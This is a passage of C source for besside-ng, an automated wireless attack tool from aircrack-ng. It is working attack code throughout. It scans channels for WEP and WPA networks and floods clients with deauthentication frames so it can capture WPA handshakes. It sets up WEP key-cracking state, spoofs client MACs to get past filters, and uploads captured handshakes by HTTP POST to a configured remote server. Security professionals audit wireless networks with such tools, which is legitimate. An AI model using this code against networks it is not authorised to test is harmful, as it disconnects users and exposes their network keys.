1 /*
2 * Copyright (C) 2010 Andrea Bittau <bittau@cs.stanford.edu>
3 *
4 * This program is free software; you can redistribute it and/or modify
5 * it under the terms of the GNU General Public License as published by
6 * the Free Software Foundation; either version 2 of the License, or
7 * (at your option) any later version.
8 *
9 * This program is distributed in the hope that it will be useful,
10 * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 * GNU General Public License for more details.
13 *
14 * You should have received a copy of the GNU General Public License
15 * along with this program; if not, write to the Free Software
16 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
17 *
18 *
19 * In addition, as a special exception, the copyright holders give
20 * permission to link the code of portions of this program with the
21 * OpenSSL library under certain conditions as described in each
22 * individual source file, and distribute linked combinations
23 * including the two.
24 * You must obey the GNU General Public License in all respects
25 * for all of the code used other than OpenSSL. * If you modify
26 * file(s) with this exception, you may extend this exception to your
27 * version of the file(s), but you are not obligated to do so. * If you
28 * do not wish to do so, delete this exception statement from your
29 * version. * If you delete this exception statement from all source
30 * files in the program, then also delete it here.
31 */
32
33 #include <sys/socket.h>
34 #include <netinet/in.h>
35 #include <arpa/inet.h>
36 #include <sys/select.h>
37 #include <sys/types.h>
38 #include <sys/wait.h>
39 #include <sys/time.h>
40 #include <sys/stat.h>
41 #include <fcntl.h>
42 #include <stdio.h>
43 #include <stdlib.h>
44 #include <getopt.h>
45 #include <err.h>
46 #include <signal.h>
47 #include <string.h>
48 #include <assert.h>
49 #include <time.h>
50 #include <stdarg.h>
51 #include <errno.h>
52 #include <netdb.h>
53 #include <unistd.h>
54 #include <limits.h>
55
56 #ifdef HAVE_PCRE
57 #include <pcre.h>
58 #endif
59
60 #include "aircrack-ng.h"
61 #include "version.h"
62 #include "aircrack-ptw-lib.h"
63 #include "aircrack-osdep/osdep.h"
64 #include "ieee80211.h"
65 #include "crypto.h"
66 #include "pcap.h"
67 #include "aircrack-util/console.h"
68 #include "aircrack-util/common.h"
69
70 #ifdef UNUSED
71 #elif defined(__GNUC__)
72 #define UNUSED(x) UNUSED_##x __attribute__((unused))
73 #elif defined(__LCLINT__)
74 #define UNUSED(x) /*@unused@*/ x
75 #else
76 #define UNUSED(x) x
77 #endif
78
79 int PTW_DEFAULTBF[PTW_KEYHSBYTES]
80 = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
81 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
82
83 enum
84 {
85 STATE_SCAN = 0,
86 STATE_ATTACK,
87 STATE_DONE,
88 };
89
90 enum
91 {
92 CRYPTO_NONE = 0,
93 CRYPTO_WEP,
94 CRYPTO_WPA,
95 CRYPTO_WPA_MGT,
96 };
97
98 enum
99 {
100 ASTATE_NONE = 0,
101 ASTATE_PING,
102 ASTATE_READY,
103
104 ASTATE_DEAUTH,
105 ASTATE_WPA_CRACK,
106
107 ASTATE_WEP_PRGA_GET,
108 ASTATE_WEP_FLOOD,
109
110 ASTATE_DONE,
111 ASTATE_UNREACH,
112 };
113
114 enum
115 {
116 WSTATE_NONE = 0,
117 WSTATE_AUTH,
118 WSTATE_ASSOC,
119 };
120
121 enum
122 {
123 V_NORMAL = 0,
124 V_VERBOSE,
125 };
126
127 struct cracker;
128 struct network;
129
130 typedef void (*timer_cb)(void *);
131 typedef void (*cracker_cb)(struct cracker *, struct network * n);
132 typedef int (*check_cb)(struct network * n);
133
134 struct channel
135 {
136 int c_num;
137 struct channel * c_next;
138 };
139
140 struct conf
141 {
142 char * cf_ifname;
143 struct channel cf_channels;
144 int cf_hopfreq;
145 int cf_deauthfreq;
146 unsigned char * cf_bssid;
147 int cf_attackwait;
148 int cf_floodwait;
149 char * cf_wordlist;
150 int cf_verb;
151 int cf_to;
152 int cf_floodfreq;
153 int cf_crack_int;
154 char * cf_wpa;
155 char * cf_wep;
156 char * cf_log;
157 int cf_do_wep;
158 int cf_do_wpa;
159 char * cf_wpa_server;
160 #ifdef HAVE_PCRE
161 pcre * cf_essid_regex;
162 #endif
163 } _conf;
164
165 struct timer
166 {
167 struct timeval t_tv;
168 timer_cb t_cb;
169 void * t_arg;
170 struct timer * t_next;
171 };
172
173 struct packet
174 {
175 unsigned char p_data[2048];
176 int p_len;
177 };
178
179 struct client
180 {
181 unsigned char c_mac[6];
182 int c_wpa;
183 int c_wpa_got;
184 int c_dbm;
185 struct packet c_handshake[4];
186 struct client * c_next;
187 };
188
189 struct speed
190 {
191 unsigned int s_num;
192 struct timeval s_start;
193 unsigned int s_speed;
194 };
195
196 struct cracker
197 {
198 int cr_pid;
199 int cr_pipe[2];
200 };
201
202 struct network
203 {
204 char n_ssid[256];
205 unsigned char n_bssid[6];
206 int n_crypto;
207 int n_chan;
208 struct network * n_next;
209 struct timeval n_start;
210 int n_have_beacon;
211 struct client n_clients;
212 int n_astate;
213 int n_wstate;
214 unsigned short n_seq;
215 int n_dbm;
216 int n_ping_sent;
217 int n_ping_got;
218 int n_attempts;
219 unsigned char n_prga[2048];
220 int n_prga_len;
221 unsigned char n_replay[2048];
222 int n_replay_len;
223 int n_replay_got;
224 struct timeval n_replay_last;
225 struct speed n_flood_in;
226 struct speed n_flood_out;
227 int n_data_count;
228 int n_crack_next;
229 PTW_attackstate * n_ptw;
230 struct cracker n_cracker_wep[2];
231 unsigned char n_key[64];
232 int n_key_len;
233 struct packet n_beacon;
234 int n_beacon_wrote;
235 struct client * n_client_handshake;
236 int n_mac_filter;
237 struct client * n_client_mac;
238 int n_got_mac;
239 };
240
241 struct state
242 {
243 struct wif * s_wi;
244 int s_state;
245 struct timeval s_now;
246 struct timeval s_start;
247 struct network s_networks;
248 struct network * s_curnet;
249 struct channel * s_hopchan;
250 unsigned int s_hopcycles;
251 int s_chan;
252 unsigned char s_mac[6];
253 struct timer s_timers;
254 struct rx_info * s_ri;
255 int s_wpafd;
256 int s_wepfd;
257 } _state;
258
259 static void attack_continue(struct network * n);
260 static void attack(struct network * n);
261
show_wep_stats(int UNUSED (B),int UNUSED (force),PTW_tableentry UNUSED (table[PTW_KEYHSBYTES][PTW_n]),int UNUSED (choices[KEYHSBYTES]),int UNUSED (depth[KEYHSBYTES]),int UNUSED (prod))262 void show_wep_stats(int UNUSED(B),
263 int UNUSED(force),
264 PTW_tableentry UNUSED(table[PTW_KEYHSBYTES][PTW_n]),
265 int UNUSED(choices[KEYHSBYTES]),
266 int UNUSED(depth[KEYHSBYTES]),
267 int UNUSED(prod))
268 {
269 }
270
time_printf(int verb,char * fmt,...)271 static void time_printf(int verb, char * fmt, ...)
272 {
273 time_t now = _state.s_now.tv_sec;
274 struct tm * t;
275 va_list ap;
276
277 if (verb > _conf.cf_verb) return;
278
279 t = localtime(&now);
280 if (!t) err(1, "localtime()");
281
282 erase_line(0);
283 printf("[%.2d:%.2d:%.2d] ", t->tm_hour, t->tm_min, t->tm_sec);
284
285 va_start(ap, fmt);
286 vprintf(fmt, ap);
287 va_end(ap);
288 }
289
cracker_kill(struct cracker * c)290 static void cracker_kill(struct cracker * c)
291 {
292 if (c->cr_pid)
293 {
294 kill(c->cr_pid, SIGKILL);
295
296 if (c->cr_pipe[0]) close(c->cr_pipe[0]);
297 }
298
299 memset(c, 0, sizeof(*c));
300 }
301
mac2str(unsigned char * mac)302 static char * mac2str(unsigned char * mac)
303 {
304 static char out[18];
305
306 snprintf(out,
307 sizeof(out),
308 "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x",
309 mac[0],
310 mac[1],
311 mac[2],
312 mac[3],
313 mac[4],
314 mac[5]);
315
316 return out;
317 }
318
save_network(FILE * f,struct network * n)319 static void save_network(FILE * f, struct network * n)
320 {
321 int len;
322
323 if (n->n_crypto != CRYPTO_WPA && n->n_crypto != CRYPTO_WEP) return;
324
325 if (!n->n_have_beacon) return;
326
327 if (n->n_astate != ASTATE_DONE) return;
328
329 len = strlen(n->n_ssid);
330
331 fprintf(f, "%s", n->n_ssid);
332
333 while (len++ < 20) fprintf(f, " ");
334
335 fprintf(f, "| ");
336 len = 0;
337 if (n->n_key_len)
338 {
339 for (len = 0; len < n->n_key_len; len++)
340 {
341 if (len != 0) fprintf(f, ":");
342
343 fprintf(f, "%.2x", n->n_key[len]);
344 }
345
346 len = n->n_key_len * 3 - 1;
347 }
348
349 if (n->n_client_handshake)
350 {
351 fprintf(f, "Got WPA handshake");
352 len = 17;
353 }
354
355 if (n->n_astate == ASTATE_UNREACH)
356 {
357 fprintf(f, "Crappy connection");
358 len = 17;
359 }
360
361 while (len++ < 38) fprintf(f, " ");
362
363 fprintf(f, " | %s", mac2str(n->n_bssid));
364
365 fprintf(f, " | ");
366 if (n->n_got_mac) fprintf(f, "%s", mac2str(n->n_client_mac->c_mac));
367
368 fprintf(f, "\n");
369 }
370
save_log(void)371 static void save_log(void)
372 {
373 FILE * f;
374 struct network * n = _state.s_networks.n_next;
375
376 f = fopen(_conf.cf_log, "w");
377 if (!f) err(1, "fopen()");
378
379 fprintf(f, "# SSID ");
380 fprintf(f, "| KEY | BSSID");
381 fprintf(f, " | MAC filter\n");
382
383 while (n)
384 {
385 save_network(f, n);
386 n = n->n_next;
387 }
388
389 fclose(f);
390 }
391
do_wait(int UNUSED (x))392 static void do_wait(int UNUSED(x)) { wait(NULL); }
393
xmalloc(size_t sz)394 static void * xmalloc(size_t sz)
395 {
396 void * p = malloc(sz);
397
398 if (!p) err(1, "malloc()");
399
400 return p;
401 }
402
time_diff(struct timeval * past,struct timeval * now)403 static int time_diff(struct timeval * past, struct timeval * now)
404 {
405 int p = 0, n = 0;
406
407 if (now->tv_sec > past->tv_sec)
408 n = (now->tv_sec - past->tv_sec) * 1000 * 1000;
409 else
410 p = (past->tv_sec - now->tv_sec) * 1000 * 1000;
411
412 n += now->tv_usec;
413 p += past->tv_usec;
414
415 return n - p;
416 }
417
timer_next(struct timeval * tv)418 static void timer_next(struct timeval * tv)
419 {
420 struct timer * t = _state.s_timers.t_next;
421 int diff;
422
423 if (!t)
424 {
425 tv->tv_sec = 1;
426 tv->tv_usec = 0;
427 return;
428 }
429
430 diff = time_diff(&_state.s_now, &t->t_tv);
431 if (diff <= 0)
432 {
433 tv->tv_sec = 0;
434 tv->tv_usec = 0;
435 return;
436 }
437
438 tv->tv_sec = diff / (1000 * 1000);
439 tv->tv_usec = diff - (tv->tv_sec * 1000 * 1000);
440 }
441
timer_in(int us,timer_cb cb,void * arg)442 static void timer_in(int us, timer_cb cb, void * arg)
443 {
444 struct timer * t = xmalloc(sizeof(*t));
445 struct timer * p = &_state.s_timers;
446 int s;
447
448 memset(t, 0, sizeof(*t));
449
450 t->t_cb = cb;
451 t->t_arg = arg;
452 t->t_tv = _state.s_now;
453
454 t->t_tv.tv_usec += us;
455
456 s = t->t_tv.tv_usec / (1000 * 1000);
457 t->t_tv.tv_sec += s;
458 t->t_tv.tv_usec -= s * 1000 * 1000;
459
460 while (p->t_next)
461 {
462 if (time_diff(&t->t_tv, &p->t_next->t_tv) > 0) break;
463
464 p = p->t_next;
465 }
466
467 t->t_next = p->t_next;
468 p->t_next = t;
469
470 // timer_print();
471 }
472
timer_check(void)473 static void timer_check(void)
474 {
475 // timer_print();
476
477 while (_state.s_timers.t_next)
478 {
479 struct timer * t = _state.s_timers.t_next;
480
481 if (time_diff(&t->t_tv, &_state.s_now) < 0) break;
482
483 _state.s_timers.t_next = t->t_next;
484
485 t->t_cb(t->t_arg);
486
487 free(t);
488 }
489 }
490
get_bssid(struct ieee80211_frame * wh)491 static unsigned char * get_bssid(struct ieee80211_frame * wh)
492 {
493 int type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
494 uint16_t * p = (uint16_t *) (wh + 1);
495
496 if (type == IEEE80211_FC0_TYPE_CTL) return NULL;
497
498 if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS)
499 return wh->i_addr1;
500 else if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS)
501 return wh->i_addr2;
502
503 // XXX adhoc?
504 if (type == IEEE80211_FC0_TYPE_DATA) return wh->i_addr1;
505
506 switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK)
507 {
508 case IEEE80211_FC0_SUBTYPE_ASSOC_REQ:
509 case IEEE80211_FC0_SUBTYPE_REASSOC_REQ:
510 case IEEE80211_FC0_SUBTYPE_DISASSOC:
511 return wh->i_addr1;
512
513 case IEEE80211_FC0_SUBTYPE_AUTH:
514 /* XXX check len */
515 switch (le16toh(p[1]))
516 {
517 case 1:
518 case 3:
519 return wh->i_addr1;
520
521 case 2:
522 case 4:
523 return wh->i_addr2;
524 }
525 return NULL;
526
527 case IEEE80211_FC0_SUBTYPE_ASSOC_RESP:
528 case IEEE80211_FC0_SUBTYPE_REASSOC_RESP:
529 case IEEE80211_FC0_SUBTYPE_PROBE_RESP:
530 case IEEE80211_FC0_SUBTYPE_BEACON:
531 case IEEE80211_FC0_SUBTYPE_DEAUTH:
532 return wh->i_addr2;
533
534 case IEEE80211_FC0_SUBTYPE_PROBE_REQ:
535 default:
536 return NULL;
537 }
538 }
539
network_get(struct ieee80211_frame * wh)540 static struct network * network_get(struct ieee80211_frame * wh)
541 {
542 struct network * n = _state.s_networks.n_next;
543 unsigned char * bssid = get_bssid(wh);
544
545 if (!bssid) return NULL;
546
547 while (n)
548 {
549 if (memcmp(n->n_bssid, bssid, sizeof(n->n_bssid)) == 0) return n;
550
551 n = n->n_next;
552 }
553
554 return NULL;
555 }
556
network_new(void)557 static struct network * network_new(void)
558 {
559 struct network * n = xmalloc(sizeof(*n));
560
561 memset(n, 0, sizeof(*n));
562 n->n_crack_next = _conf.cf_crack_int;
563
564 return n;
565 }
566
do_network_add(struct network * n)567 static void do_network_add(struct network * n)
568 {
569 struct network * p = &_state.s_networks;
570
571 while (p->n_next) p = p->n_next;
572
573 p->n_next = n;
574 }
575
network_add(struct ieee80211_frame * wh)576 static struct network * network_add(struct ieee80211_frame * wh)
577 {
578 struct network * n;
579 unsigned char * bssid = get_bssid(wh);
580
581 if (!bssid) return NULL;
582
583 n = network_new();
584
585 memcpy(n->n_bssid, bssid, sizeof(n->n_bssid));
586
587 do_network_add(n);
588
589 return n;
590 }
591
print_hex(void * p,int len)592 static inline void print_hex(void * p, int len)
593 {
594 unsigned char * x = p;
595
596 while (len--)
597 {
598 printf("%.2x", *x++);
599 if (len) printf(":");
600 }
601 }
602
network_print(struct network * n)603 static void network_print(struct network * n)
604 {
605 const char * crypto = "dunno";
606
607 switch (n->n_crypto)
608 {
609 case CRYPTO_NONE:
610 crypto = "none";
611 break;
612
613 case CRYPTO_WEP:
614 crypto = "WEP";
615 break;
616
617 case CRYPTO_WPA:
618 crypto = "WPA";
619 break;
620
621 case CRYPTO_WPA_MGT:
622 crypto = "WPA-SECURE";
623 break;
624 }
625
626 time_printf(V_VERBOSE,
627 "Found AP %s [%s] chan %d crypto %s dbm %d\n",
628 mac2str(n->n_bssid),
629 n->n_ssid,
630 n->n_chan,
631 crypto,
632 n->n_dbm);
633 }
634
channel_set(int num)635 static void channel_set(int num)
636 {
637 if (wi_set_channel(_state.s_wi, num) == -1) err(1, "wi_set_channel()");
638
639 _state.s_chan = num;
640 }
641
fnseq(unsigned short fn,unsigned short seq)642 static unsigned short fnseq(unsigned short fn, unsigned short seq)
643 {
644 unsigned short r = 0;
645
646 assert(fn < 16);
647
648 r = fn;
649
650 r |= ((seq % 4096) << IEEE80211_SEQ_SEQ_SHIFT);
651
652 return htole16(r);
653 }
654
fill_basic(struct network * n,struct ieee80211_frame * wh)655 static void fill_basic(struct network * n, struct ieee80211_frame * wh)
656 {
657 uint16_t * p;
658
659 memset(wh, 0, sizeof(*wh));
660
661 p = (uint16_t *) wh->i_dur;
662 *p = htole16(32767);
663
664 p = (uint16_t *) wh->i_seq;
665 *p = fnseq(0, n->n_seq++);
666 }
667
wifi_send(void * p,int len)668 static void wifi_send(void * p, int len)
669 {
670 int rc;
671 struct tx_info tx;
672
673 memset(&tx, 0, sizeof(tx));
674
675 rc = wi_write(_state.s_wi, p, len, &tx);
676 if (rc == -1) err(1, "wi_write()");
677 }
678
deauth_send(struct network * n,unsigned char * mac)679 static void deauth_send(struct network * n, unsigned char * mac)
680 {
681 unsigned char buf[2048];
682 struct ieee80211_frame * wh = (struct ieee80211_frame *) buf;
683 uint16_t * rc = (uint16_t *) (wh + 1);
684
685 fill_basic(n, wh);
686 memcpy(wh->i_addr1, mac, sizeof(wh->i_addr1));
687 memcpy(wh->i_addr2, n->n_bssid, sizeof(wh->i_addr2));
688 memcpy(wh->i_addr3, n->n_bssid, sizeof(wh->i_addr3));
689
690 wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_DEAUTH;
691
692 *rc++ = htole16(7);
693
694 time_printf(V_VERBOSE, "Sending deauth to %s\n", mac2str(mac));
695
696 wifi_send(wh, (unsigned long) rc - (unsigned long) wh);
697 }
698
deauth(void * arg)699 static void deauth(void * arg)
700 {
701 struct network * n = arg;
702 struct client * c = n->n_clients.c_next;
703
704 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n
705 || n->n_astate != ASTATE_DEAUTH)
706 return;
707
708 deauth_send(n, BROADCAST);
709
710 while (c)
711 {
712 deauth_send(n, c->c_mac);
713 c = c->c_next;
714 }
715
716 timer_in(_conf.cf_deauthfreq * 1000, deauth, n);
717 }
718
open_pcap(char * fname)719 static int open_pcap(char * fname)
720 {
721 int fd;
722 struct pcap_file_header pfh;
723
724 fd = open(fname, O_RDWR | O_APPEND);
725 if (fd != -1)
726 {
727 time_printf(V_NORMAL, "Appending to %s\n", fname);
728 return fd;
729 }
730
731 memset(&pfh, 0, sizeof(pfh));
732 pfh.magic = TCPDUMP_MAGIC;
733 pfh.version_major = PCAP_VERSION_MAJOR;
734 pfh.version_minor = PCAP_VERSION_MINOR;
735 pfh.thiszone = 0;
736 pfh.sigfigs = 0;
737 pfh.snaplen = 65535;
738 pfh.linktype = LINKTYPE_IEEE802_11;
739
740 fd = open(fname, O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
741 if (fd == -1) err(1, "open(%s)", fname);
742
743 if (write(fd, &pfh, sizeof(pfh)) != sizeof(pfh)) err(1, "write()");
744
745 return fd;
746 }
747
write_pcap(int fd,void * p,int len)748 static void write_pcap(int fd, void * p, int len)
749 {
750 struct pcap_pkthdr pkh;
751
752 memset(&pkh, 0, sizeof(pkh));
753
754 pkh.caplen = pkh.len = len;
755 pkh.tv_sec = _state.s_now.tv_sec;
756 pkh.tv_usec = _state.s_now.tv_usec;
757
758 if (write(fd, &pkh, sizeof(pkh)) != sizeof(pkh)) err(1, "write()");
759
760 if (write(fd, p, len) != len) err(1, "write()");
761 }
762
packet_write_pcap(int fd,struct packet * p)763 static void packet_write_pcap(int fd, struct packet * p)
764 {
765 write_pcap(fd, p->p_data, p->p_len);
766 }
767
wpa_upload(void)768 static void wpa_upload(void)
769 {
770 struct sockaddr_in s_in;
771 int s;
772 char buf[4096];
773 char boundary[128];
774 char h1[1024];
775 char form[1024];
776 struct stat stat;
777 off_t off;
778 int tot;
779 int ok = 0;
780
781 memset(&s_in, 0, sizeof(s_in));
782
783 s_in.sin_family = PF_INET;
784 s_in.sin_port = htons(80);
785
786 if (inet_aton(_conf.cf_wpa_server, &s_in.sin_addr) == 0)
787 {
788 struct hostent * he;
789
790 he = gethostbyname(_conf.cf_wpa_server);
791 if (!he) goto __no_resolve;
792
793 if (!he->h_addr_list[0])
794 {
795 __no_resolve:
796 time_printf(V_NORMAL, "Can't resolve %s\n", _conf.cf_wpa_server);
797 return;
798 }
799
800 memcpy(&s_in.sin_addr, he->h_addr_list[0], 4);
801 }
802
803 if ((s = socket(s_in.sin_family, SOCK_STREAM, 0)) == -1) err(1, "socket()");
804
805 if (connect(s, (struct sockaddr *) &s_in, sizeof(s_in)) == -1)
806 {
807 time_printf(V_NORMAL, "Can't connect to %s\n", _conf.cf_wpa_server);
808
809 close(s);
810 return;
811 }
812
813 if (fstat(_state.s_wpafd, &stat) == -1) err(1, "fstat()");
814
815 snprintf(boundary, sizeof(boundary), "37872861916401860062104501923");
816
817 snprintf(h1,
818 sizeof(h1),
819 "--%s\r\n"
820 "Content-Disposition: form-data;"
821 " name=\"file\";"
822 " filename=\"wpa.cap\"\r\n"
823 "Content-Type: application/octet-stream\r\n\r\n",
824 boundary);
825
826 snprintf(form,
827 sizeof(form),
828 "\r\n"
829 "--%s\r\n"
830 "Content-Disposition: form-data;"
831 " name=\"fs\"\r\n\r\n"
832 "Upload"
833 "\r\n"
834 "%s--\r\n",
835 boundary,
836 boundary);
837
838 tot = stat.st_size;
839
840 snprintf(buf,
841 sizeof(buf),
842 "POST /index.php HTTP/1.0\r\n"
843 "Host: %s\r\n"
844 "User-Agent: besside-ng\r\n"
845 "Content-Type: multipart/form-data; boundary=%s\r\n"
846 "Content-Length: %d\r\n\r\n",
847 _conf.cf_wpa_server,
848 boundary,
849 (int) (strlen(h1) + strlen(form) + tot));
850
851 if (write(s, buf, strlen(buf)) != (int) strlen(buf)) goto __fail;
852
853 if (write(s, h1, strlen(h1)) != (int) strlen(h1)) goto __fail;
854
855 if ((off = lseek(_state.s_wpafd, 0, SEEK_CUR)) == (off_t) -1)
856 err(1, "lseek()");
857
858 if (lseek(_state.s_wpafd, 0, SEEK_SET) == (off_t) -1) err(1, "lseek()");
859
860 while (tot)
861 {
862 int l = tot;
863
864 if (l > (int) sizeof(buf)) l = sizeof(buf);
865
866 if (read(_state.s_wpafd, buf, l) != l) err(1, "read()");
867
868 if (write(s, buf, l) != l) goto __fail;
869
870 tot -= l;
871 }
872
873 if (write(s, form, strlen(form)) != (int) strlen(form)) goto __fail;
874
875 if (lseek(_state.s_wpafd, off, SEEK_SET) == (off_t) -1) err(1, "lseek()");
876
877 while ((tot = read(s, buf, sizeof(buf) - 1)) > 0)
878 {
879 char * p;
880
881 buf[tot] = 0;
882
883 p = strstr(buf, "\r\n\r\n");
884 if (!p) goto __fail;
885
886 p += 4;
887
888 if (atoi(p) == 2)
889 ok = 1;
890 else
891 goto __fail;
892 }
893
894 if (!ok) goto __fail;
895
896 close(s);
897
898 time_printf(
899 V_NORMAL, "Uploaded WPA handshake to %s\n", _conf.cf_wpa_server);
900
901 return;
902 __fail:
903 close(s);
904 time_printf(V_NORMAL, "WPA handshake upload failed\n");
905 }
906
wpa_crack(struct network * n)907 static void wpa_crack(struct network * n)
908 {
909 int i;
910
911 packet_write_pcap(_state.s_wpafd, &n->n_beacon);
912
913 for (i = 0; i < 4; i++)
914 {
915 struct packet * p = &n->n_client_handshake->c_handshake[i];
916
917 if (p->p_len) packet_write_pcap(_state.s_wpafd, p);
918 }
919
920 fsync(_state.s_wpafd);
921
922 if (_conf.cf_wpa_server)
923 wpa_upload();
924 else
925 {
926 time_printf(V_NORMAL, "Run aircrack on %s for WPA key\n", _conf.cf_wpa);
927 }
928
929 /* that was fast cracking! */
930 n->n_astate = ASTATE_DONE;
931
932 attack_continue(n);
933 }
934
attack_wpa(struct network * n)935 static void attack_wpa(struct network * n)
936 {
937 switch (n->n_astate)
938 {
939 case ASTATE_READY:
940 n->n_astate = ASTATE_DEAUTH;
941 /* fallthrough */
942 case ASTATE_DEAUTH:
943 deauth(n);
944 break;
945
946 case ASTATE_WPA_CRACK:
947 wpa_crack(n);
948 break;
949 }
950 }
951
hop(void * arg)952 static void hop(void * arg)
953 {
954 int old = _state.s_chan;
955
956 if (_state.s_state != STATE_SCAN) return;
957
958 while (1)
959 {
960 struct channel * c = _state.s_hopchan->c_next;
961
962 if (c->c_num == old) break;
963
964 // skip unsupported chan. XXX check if we run out.
965 if (wi_set_channel(_state.s_wi, c->c_num) == -1)
966 {
967 _state.s_hopchan->c_next = c->c_next;
968 free(c);
969 }
970 else
971 break;
972 }
973
974 _state.s_hopchan = _state.s_hopchan->c_next;
975 _state.s_chan = _state.s_hopchan->c_num;
976
977 // XXX assume we don't lose head
978 if (_state.s_hopchan == _conf.cf_channels.c_next) _state.s_hopcycles++;
979
980 timer_in(_conf.cf_hopfreq * 1000, hop, arg);
981 }
982
scan_start(void)983 static void scan_start(void)
984 {
985 _state.s_state = STATE_SCAN;
986 _state.s_hopcycles = 0;
987
988 hop(NULL); /* XXX check other hopper */
989 }
990
send_auth(struct network * n)991 static void send_auth(struct network * n)
992 {
993 unsigned char buf[2048];
994 struct ieee80211_frame * wh = (struct ieee80211_frame *) buf;
995 uint16_t * rc = (uint16_t *) (wh + 1);
996
997 fill_basic(n, wh);
998 memcpy(wh->i_addr1, n->n_bssid, sizeof(wh->i_addr1));
999 memcpy(wh->i_addr2, _state.s_mac, sizeof(wh->i_addr2));
1000 memcpy(wh->i_addr3, n->n_bssid, sizeof(wh->i_addr3));
1001
1002 wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_AUTH;
1003
1004 *rc++ = htole16(0);
1005 *rc++ = htole16(1);
1006 *rc++ = htole16(0);
1007
1008 wifi_send(wh, (unsigned long) rc - (unsigned long) wh);
1009 }
1010
ping_send(struct network * n)1011 static void ping_send(struct network * n)
1012 {
1013 send_auth(n);
1014
1015 time_printf(V_VERBOSE, "Sending ping to %s\n", n->n_ssid);
1016
1017 n->n_ping_sent++;
1018 }
1019
ping_reply(struct network * n,struct ieee80211_frame * wh)1020 static void ping_reply(struct network * n, struct ieee80211_frame * wh)
1021 {
1022 uint16_t * p = (uint16_t *) (wh + 1);
1023
1024 if (le16toh(p[1]) == 2)
1025 {
1026 time_printf(V_VERBOSE, "Ping reply %s\n", n->n_ssid);
1027 n->n_ping_got++;
1028 }
1029 }
1030
set_mac(void * mac)1031 static void set_mac(void * mac)
1032 {
1033 if (memcmp(mac, _state.s_mac, 6) == 0) return;
1034 #if 0
1035 if (wi_set_mac(_state.s_wi, mac) == -1)
1036 err(1, "wi_set_mac()");
1037 #endif
1038 time_printf(V_VERBOSE,
1039 "Can't set MAC - this'll suck."
1040 " Set it manually to %s for best performance.\n",
1041 mac2str(mac));
1042
1043 memcpy(_state.s_mac, mac, 6);
1044 }
1045
have_mac(struct network * n)1046 static int have_mac(struct network * n)
1047 {
1048 if (!n->n_mac_filter) return 1;
1049
1050 /* XXX try different clients based on feedback */
1051 if (!n->n_client_mac) n->n_client_mac = n->n_clients.c_next;
1052
1053 if (!n->n_client_mac) return 0;
1054
1055 set_mac(n->n_client_mac->c_mac);
1056
1057 return 1;
1058 }
1059
attack_ping(void * a)1060 static void attack_ping(void * a)
1061 {
1062 struct network * n = a;
1063
1064 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n) return;
1065
1066 if (n->n_ping_sent == 10)
1067 {
1068 int got = n->n_ping_got;
1069 int sent = n->n_ping_sent;
1070 int loss = 100 - ((double) got / (double) sent * 100.0);
1071
1072 if (loss < 0) loss = 0;
1073
1074 time_printf(V_VERBOSE,
1075 "Ping results for %s %d/%d (%d%% loss)\n",
1076 n->n_ssid,
1077 got,
1078 sent,
1079 loss);
1080
1081 if (loss >= 80)
1082 {
1083 time_printf(V_NORMAL,
1084 "Crappy connection - %s unreachable"
1085 " got %d/%d (%d%% loss) [%d dbm]\n",
1086 n->n_ssid,
1087 got,
1088 sent,
1089 loss,
1090 n->n_dbm);
1091
1092 n->n_astate = ASTATE_UNREACH;
1093 }
1094 else
1095 n->n_astate = ASTATE_READY;
1096
1097 attack_continue(n);
1098 return;
1099 }
1100
1101 ping_send(n);
1102
1103 timer_in(100 * 1000, attack_ping, n);
1104 }
1105
1106 #ifdef HAVE_PCRE
is_filtered_essid(char * essid)1107 static int is_filtered_essid(char * essid)
1108 {
1109 int ret = 0;
1110
1111 if (_conf.cf_essid_regex)
1112 {
1113 return pcre_exec(_conf.cf_essid_regex,
1114 NULL,
1115 (char *) essid,
1116 strnlen((char *) essid, MAX_IE_ELEMENT_SIZE),
1117 0,
1118 0,
1119 NULL,
1120 0)
1121 < 0;
1122 }
1123
1124 return ret;
1125 }
1126 #endif
1127
1128 // this should always return true -sorbo
should_attack(struct network * n)1129 static int should_attack(struct network * n)
1130 {
1131 if (_conf.cf_bssid && memcmp(_conf.cf_bssid, n->n_bssid, 6) != 0) return 0;
1132
1133 #ifdef HAVE_PCRE
1134 if (is_filtered_essid(n->n_ssid))
1135 {
1136 return 0;
1137 }
1138 #endif
1139
1140 if (!n->n_have_beacon) return 0;
1141
1142 switch (n->n_astate)
1143 {
1144 case ASTATE_DONE:
1145 case ASTATE_UNREACH:
1146 if (_conf.cf_bssid) _state.s_state = STATE_DONE;
1147 return 0;
1148 }
1149
1150 if (n->n_crypto != CRYPTO_WEP && n->n_crypto != CRYPTO_WPA) return 0;
1151
1152 if (!_conf.cf_do_wep && n->n_crypto == CRYPTO_WEP) return 0;
1153
1154 return 1;
1155 }
1156
check_ownable(struct network * n)1157 static int check_ownable(struct network * n) { return should_attack(n); }
1158
check_owned(struct network * n)1159 static int check_owned(struct network * n)
1160 {
1161 /* resumed network */
1162 if (n->n_beacon.p_len == 0) return 0;
1163
1164 return n->n_astate == ASTATE_DONE;
1165 }
1166
check_unreach(struct network * n)1167 static int check_unreach(struct network * n)
1168 {
1169 return n->n_astate == ASTATE_UNREACH;
1170 }
1171
print_list(char * label,check_cb cb)1172 static void print_list(char * label, check_cb cb)
1173 {
1174 struct network * n = _state.s_networks.n_next;
1175 int first = 1;
1176
1177 printf("%s [", label);
1178
1179 while (n)
1180 {
1181 if (cb(n))
1182 {
1183 if (first)
1184 first = 0;
1185 else
1186 printf(", ");
1187
1188 printf("%s", n->n_ssid);
